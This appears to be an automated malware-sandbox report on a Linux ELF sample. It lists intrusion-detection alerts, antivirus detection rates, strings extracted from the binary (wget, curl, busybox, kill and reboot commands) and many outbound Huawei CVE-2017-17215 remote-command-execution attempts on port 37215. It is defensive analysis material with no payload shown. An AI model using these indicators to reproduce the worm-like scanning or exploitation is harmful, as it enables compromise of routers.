                  2024-09-21T15:22:03.311491+020028352221A Network Trojan was detected192.168.2.1459740157.27.107.17237215TCP
                  2024-09-21T15:22:03.311697+020028352221A Network Trojan was detected192.168.2.1454176197.76.119.9837215TCP
                  2024-09-21T15:22:03.311959+020028352221A Network Trojan was detected192.168.2.1447106197.86.90.18937215TCP
                  2024-09-21T15:22:03.312552+020028352221A Network Trojan was detected192.168.2.1445242157.10.81.3237215TCP
                  2024-09-21T15:22:03.313794+020028352221A Network Trojan was detected192.168.2.145693650.115.25.8937215TCP
                  2024-09-21T15:22:03.314675+020028352221A Network Trojan was detected192.168.2.1436550115.138.26.10737215TCP
                  2024-09-21T15:22:03.320513+020028352221A Network Trojan was detected192.168.2.1446980197.193.21.7137215TCP
                  2024-09-21T15:22:03.324898+020028352221A Network Trojan was detected192.168.2.1459134157.213.249.9837215TCP
                  2024-09-21T15:22:03.335301+020028352221A Network Trojan was detected192.168.2.1449610197.189.172.9437215TCP
                  2024-09-21T15:22:03.335354+020028352221A Network Trojan was detected192.168.2.1443470197.244.183.1937215TCP
                  2024-09-21T15:22:03.335734+020028352221A Network Trojan was detected192.168.2.144153041.70.252.4137215TCP
                  2024-09-21T15:22:03.341392+020028352221A Network Trojan was detected192.168.2.1448386197.103.106.8437215TCP
                  2024-09-21T15:22:03.351049+020028352221A Network Trojan was detected192.168.2.1459266211.1.140.12437215TCP
                  2024-09-21T15:22:03.360586+020028352221A Network Trojan was detected192.168.2.1451036157.100.46.14437215TCP
                  2024-09-21T15:22:03.361730+020028352221A Network Trojan was detected192.168.2.143405441.124.249.437215TCP
                  2024-09-21T15:22:03.933506+020028352221A Network Trojan was detected192.168.2.1455358221.208.83.22437215TCP
                  2024-09-21T15:22:04.302876+020028352221A Network Trojan was detected192.168.2.1450836129.203.148.4437215TCP
                  2024-09-21T15:22:04.303104+020028352221A Network Trojan was detected192.168.2.145289641.159.210.8537215TCP
                  2024-09-21T15:22:04.303137+020028352221A Network Trojan was detected192.168.2.145150841.170.15.6237215TCP
                  2024-09-21T15:22:04.317452+020028352221A Network Trojan was detected192.168.2.1442628197.186.175.22537215TCP
                  2024-09-21T15:22:04.317469+020028352221A Network Trojan was detected192.168.2.1456626157.77.227.8737215TCP
                  2024-09-21T15:22:04.318608+020028352221A Network Trojan was detected192.168.2.1452228157.152.246.24337215TCP
                  2024-09-21T15:22:04.318627+020028352221A Network Trojan was detected192.168.2.145935624.80.167.8837215TCP
                  2024-09-21T15:22:04.318662+020028352221A Network Trojan was detected192.168.2.1454652197.103.21.23737215TCP
                  2024-09-21T15:22:04.318731+020028352221A Network Trojan was detected192.168.2.1436318188.23.83.4337215TCP
                  2024-09-21T15:22:04.318752+020028352221A Network Trojan was detected192.168.2.145559841.160.19.5437215TCP
                  2024-09-21T15:22:04.318755+020028352221A Network Trojan was detected192.168.2.1452782158.75.20.21837215TCP
                  2024-09-21T15:22:04.318776+020028352221A Network Trojan was detected192.168.2.145841441.252.121.22437215TCP
                  2024-09-21T15:22:04.318831+020028352221A Network Trojan was detected192.168.2.1455978157.235.150.17737215TCP
                  2024-09-21T15:22:04.320655+020028352221A Network Trojan was detected192.168.2.1444330157.42.148.14937215TCP
                  2024-09-21T15:22:04.320683+020028352221A Network Trojan was detected192.168.2.1456112157.149.215.5737215TCP
                  2024-09-21T15:22:04.320714+020028352221A Network Trojan was detected192.168.2.1437356157.63.146.24537215TCP
                  2024-09-21T15:22:04.320739+020028352221A Network Trojan was detected192.168.2.1455552114.0.16.4337215TCP
                  2024-09-21T15:22:04.320805+020028352221A Network Trojan was detected192.168.2.143721241.129.29.18037215TCP
                  2024-09-21T15:22:04.320819+020028352221A Network Trojan was detected192.168.2.146048441.9.29.17437215TCP
                  2024-09-21T15:22:04.320849+020028352221A Network Trojan was detected192.168.2.1447898197.200.193.13837215TCP
                  2024-09-21T15:22:04.320887+020028352221A Network Trojan was detected192.168.2.144365880.59.30.8537215TCP
                  2024-09-21T15:22:04.320914+020028352221A Network Trojan was detected192.168.2.1434074157.23.154.23837215TCP
                  2024-09-21T15:22:04.320932+020028352221A Network Trojan was detected192.168.2.143520441.72.185.8337215TCP
                  2024-09-21T15:22:04.320964+020028352221A Network Trojan was detected192.168.2.1447690155.34.133.18437215TCP
                  2024-09-21T15:22:04.323145+020028352221A Network Trojan was detected192.168.2.1453684197.123.106.2137215TCP
                  2024-09-21T15:22:04.323181+020028352221A Network Trojan was detected192.168.2.145578241.91.120.15337215TCP
                  2024-09-21T15:22:04.323201+020028352221A Network Trojan was detected192.168.2.1452530138.205.166.12237215TCP
                  2024-09-21T15:22:04.328023+020028352221A Network Trojan was detected192.168.2.144806441.248.104.22137215TCP
                  2024-09-21T15:22:04.328067+020028352221A Network Trojan was detected192.168.2.1443778209.162.2.15637215TCP
                  2024-09-21T15:22:04.329828+020028352221A Network Trojan was detected192.168.2.144357841.247.221.6737215TCP
                  2024-09-21T15:22:04.330674+020028352221A Network Trojan was detected192.168.2.146034641.97.110.22337215TCP
                  2024-09-21T15:22:04.347610+020028352221A Network Trojan was detected192.168.2.1433956157.142.218.4637215TCP
                  2024-09-21T15:22:04.367039+020028352221A Network Trojan was detected192.168.2.1451224157.92.109.2337215TCP
                  2024-09-21T15:22:04.382653+020028352221A Network Trojan was detected192.168.2.143602841.185.255.7037215TCP
                  2024-09-21T15:22:05.312965+020028352221A Network Trojan was detected192.168.2.145130641.181.196.17037215TCP
                  2024-09-21T15:22:05.313044+020028352221A Network Trojan was detected192.168.2.1442682141.166.141.137215TCP
                  2024-09-21T15:22:05.313233+020028352221A Network Trojan was detected192.168.2.1440392197.32.69.25237215TCP
                  2024-09-21T15:22:05.313825+020028352221A Network Trojan was detected192.168.2.144755041.166.200.23937215TCP
                  2024-09-21T15:22:05.314340+020028352221A Network Trojan was detected192.168.2.143931241.96.28.24237215TCP
                  2024-09-21T15:22:05.314391+020028352221A Network Trojan was detected192.168.2.1454212197.169.3.6637215TCP
                  2024-09-21T15:22:05.314407+020028352221A Network Trojan was detected192.168.2.1455108118.214.10.6637215TCP
                  2024-09-21T15:22:05.314517+020028352221A Network Trojan was detected192.168.2.1441442197.139.93.6537215TCP
                  2024-09-21T15:22:05.328798+020028352221A Network Trojan was detected192.168.2.143908841.193.209.11337215TCP
                  2024-09-21T15:22:05.334605+020028352221A Network Trojan was detected192.168.2.1457648157.18.72.19337215TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: c0m5xRfolz.elfAvira: detected
                  Source: c0m5xRfolz.elfReversingLabs: Detection: 65%
                  Source: c0m5xRfolz.elfVirustotal: Detection: 67%Perma Link
                  Source: c0m5xRfolz.elfString: wgetcurlbusybox/bin/busyboxechocatnanotfptkillallpkilltopxargspgrep/proc/proc/%d/cmdlinerabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbin/poweroff/usr/bin/poweroff/usr/sbin/halt/usr/bin/halt3f

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51524 -> 78.175.246.179:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40250 -> 88.252.137.26:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:46354 -> 85.104.13.168:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47416 -> 197.8.17.166:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48034 -> 41.78.26.206:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:56606 -> 41.52.148.255:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48538 -> 181.43.141.40:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53482 -> 217.215.170.113:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34286 -> 197.237.191.16:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34830 -> 41.160.68.204:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40950 -> 157.81.140.211:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53722 -> 197.22.102.54:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36750 -> 197.141.214.50:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47108 -> 42.35.195.126:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:37416 -> 141.200.4.198:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:32932 -> 197.65.101.179:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42968 -> 41.47.174.149:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60718 -> 197.46.158.67:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59060 -> 41.133.30.24:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:32932 -> 157.121.209.163:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43560 -> 197.95.87.151:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35686 -> 157.192.147.18:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:44270 -> 163.220.137.24:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52166 -> 41.15.250.58:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54482 -> 197.42.220.67:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53434 -> 197.255.200.41:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:44368 -> 41.38.220.173:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60710 -> 41.17.4.235:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:50638 -> 46.200.188.25:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:44932 -> 197.139.234.44:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45890 -> 86.66.209.176:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60512 -> 41.0.124.228:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34046 -> 41.0.235.248:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55978 -> 123.9.212.57:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53152 -> 169.177.66.52:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59410 -> 41.38.89.252:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:44522 -> 41.206.215.127:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57752 -> 197.190.171.218:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60778 -> 197.40.208.142:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42672 -> 197.19.102.149:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58574 -> 157.76.12.89:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58358 -> 197.203.234.238:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60354 -> 41.97.220.177:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:44952 -> 157.137.42.15:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52062 -> 71.104.234.237:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60744 -> 157.58.10.7:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51666 -> 36.89.146.41:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40832 -> 197.253.44.123:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43240 -> 197.99.193.181:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42340 -> 197.202.85.61:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51374 -> 197.236.227.34:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:50938 -> 45.245.176.38:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:39058 -> 157.112.115.182:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60654 -> 157.97.58.224:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43232 -> 41.163.251.14:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49776 -> 159.254.124.240:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40650 -> 41.65.240.174:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:32816 -> 197.74.61.205:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:38124 -> 197.191.64.228:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47404 -> 197.226.110.213:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48924 -> 157.190.126.188:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45960 -> 41.164.156.28:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:50328 -> 41.140.67.184:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47806 -> 106.56.6.190:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:37304 -> 41.178.43.51:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:44380 -> 5.97.26.130:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40056 -> 157.143.91.213:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52004 -> 197.176.196.151:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47736 -> 157.81.182.144:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47848 -> 157.250.77.19:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54648 -> 157.5.43.169:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:44002 -> 197.180.198.239:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43872 -> 49.148.16.179:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49702 -> 157.68.62.125:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54968 -> 41.55.24.148:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52050 -> 197.176.140.191:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:38738 -> 41.10.100.12:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36296 -> 25.157.102.13:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:41478 -> 39.34.170.226:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59566 -> 41.143.225.223:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54810 -> 138.224.142.245:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36054 -> 41.15.47.209:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57494 -> 157.33.142.249:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45474 -> 157.175.96.189:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57100 -> 41.234.51.109:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54534 -> 157.62.186.122:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47388 -> 197.211.19.52:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53268 -> 92.96.240.38:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55314 -> 112.145.216.37:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40556 -> 41.42.121.210:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34636 -> 157.149.31.236:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36020 -> 157.15.131.5:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48612 -> 41.32.110.80:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:39310 -> 41.232.183.130:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53784 -> 157.254.35.20:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60674 -> 41.166.112.40:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52240 -> 197.71.183.172:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49924 -> 197.207.230.130:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34526 -> 197.217.169.10:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59822 -> 157.56.184.86:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:37872 -> 157.112.180.104:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47624 -> 197.9.67.135:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:37180 -> 157.105.209.79:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59108 -> 157.97.206.71:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:39546 -> 166.78.247.249:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49130 -> 41.8.90.154:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:44994 -> 41.167.34.203:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47742 -> 52.61.32.99:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57462 -> 157.95.193.18:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55664 -> 157.153.203.74:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:50288 -> 157.45.7.119:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55052 -> 157.156.181.4:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52692 -> 203.151.133.18:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54008 -> 197.124.41.255:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52510 -> 41.192.192.82:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60080 -> 41.15.61.167:37215
